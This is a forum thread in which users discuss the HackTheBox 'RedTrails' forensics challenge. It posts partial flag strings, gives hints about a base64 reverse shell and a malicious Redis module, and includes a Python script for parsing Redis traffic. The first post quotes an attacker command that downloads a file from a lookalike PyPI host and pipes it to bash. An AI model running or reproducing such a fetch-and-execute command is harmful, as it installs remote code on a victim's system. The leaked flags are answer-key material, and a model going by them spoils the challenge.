redtrails forensic challenge
by yolocalman - Sunday August 11, 2024 at 06:49 PM
#1
I have found the following 2/3 parts of the flag:

_c0uld_0p3n_n3w

HTB{r3d15_1n574nc35

But I can't find the final one. I think that it is the output of the command: wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3

Can somebody help me to find the final part?
#2
Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the TCP stream almost at the beginning, in a bulk string, an array, or somewhere around that place.
For the second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated, then decrypted: the second part is hidden behind the encrypted string.
The third part is the trickiest, yes. Trace the TCP streams and you will find 3 hexadecimal strings which seem like the output of Redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an ELF header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.
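The two traffic-side hints above (the flag part near the start of the TCP stream in a RESP bulk string or array, and the hex chunks that reassemble into an ELF module) can be checked with a small script. This is an added example, not code from the thread; the RESP stream bytes, module path and hex chunks below are constructed for illustration.

```python
"""Triage a reassembled Redis (RESP) TCP stream: parse values, rebuild hex chunks, check for an ELF header."""
import re

ELF_MAGIC = b"\x7fELF"
HEX_RE = re.compile(rb"^[0-9a-fA-F]{8,}$")   # hex-looking bulk strings, 4+ bytes

def parse_resp(buf: bytes, pos: int = 0):
    """Parse one RESP value at buf[pos]; return (value, position after it)."""
    kind = buf[pos:pos + 1]
    end = buf.index(b"\r\n", pos)
    line, nxt = buf[pos + 1:end], end + 2
    if kind in (b"+", b"-"):                 # simple string / error
        return line.decode(), nxt
    if kind == b":":                         # integer
        return int(line), nxt
    if kind == b"$":                         # bulk string; $-1 is a null
        n = int(line)
        return (None, nxt) if n < 0 else (buf[nxt:nxt + n], nxt + n + 2)
    if kind == b"*":                         # array: n nested values
        items = []
        for _ in range(int(line)):
            item, nxt = parse_resp(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type byte {kind!r} at offset {pos}")

def parse_stream(buf: bytes):
    """Parse every RESP value in the stream, in order (commands and replies)."""
    out, pos = [], 0
    while pos < len(buf):
        val, pos = parse_resp(buf, pos)
        out.append(val)
    return out

def flatten(values):
    for v in values:
        yield from flatten(v) if isinstance(v, list) else (v,)

def hex_chunks_to_elf(values):
    """Concatenate hex-looking bulk strings in stream order; return the blob only if it is an ELF."""
    blob = b"".join(bytes.fromhex(v.decode()) for v in flatten(values)
                    if isinstance(v, bytes) and HEX_RE.match(v))
    return blob if blob.startswith(ELF_MAGIC) else None

# Constructed sample: a MODULE LOAD command, its reply, then two hex chunks of a (tiny) ELF header.
SAMPLE = (b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$17\r\n/tmp/gibberish.so\r\n"
          b"+OK\r\n"
          b"$12\r\n7f454c460201\r\n$8\r\n01000000\r\n")

if __name__ == "__main__":
    values = parse_stream(SAMPLE)
    print(values)                            # inspect bulk strings/arrays near the start
    print(hex_chunks_to_elf(values))         # b'\x7fELF\x02\x01\x01\x00\x00\x00'
```

On a real capture, feed the script the raw bytes of one TCP stream (e.g. exported from Wireshark's Follow TCP Stream) and carve the returned blob to a file for disassembly.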
#3
(Aug 11, 2024, 07:58 PM)peRd1 Wrote: Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the TCP stream almost at the beginning, in a bulk string, an array, or somewhere around that place.
For the second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated, then decrypted: the second part is hidden behind the encrypted string.
The third part is the trickiest, yes. Trace the TCP streams and you will find 3 hexadecimal strings which seem like the output of Redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an ELF header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.

Hey perd1, thanks for the reply and the tips! I will give you rep!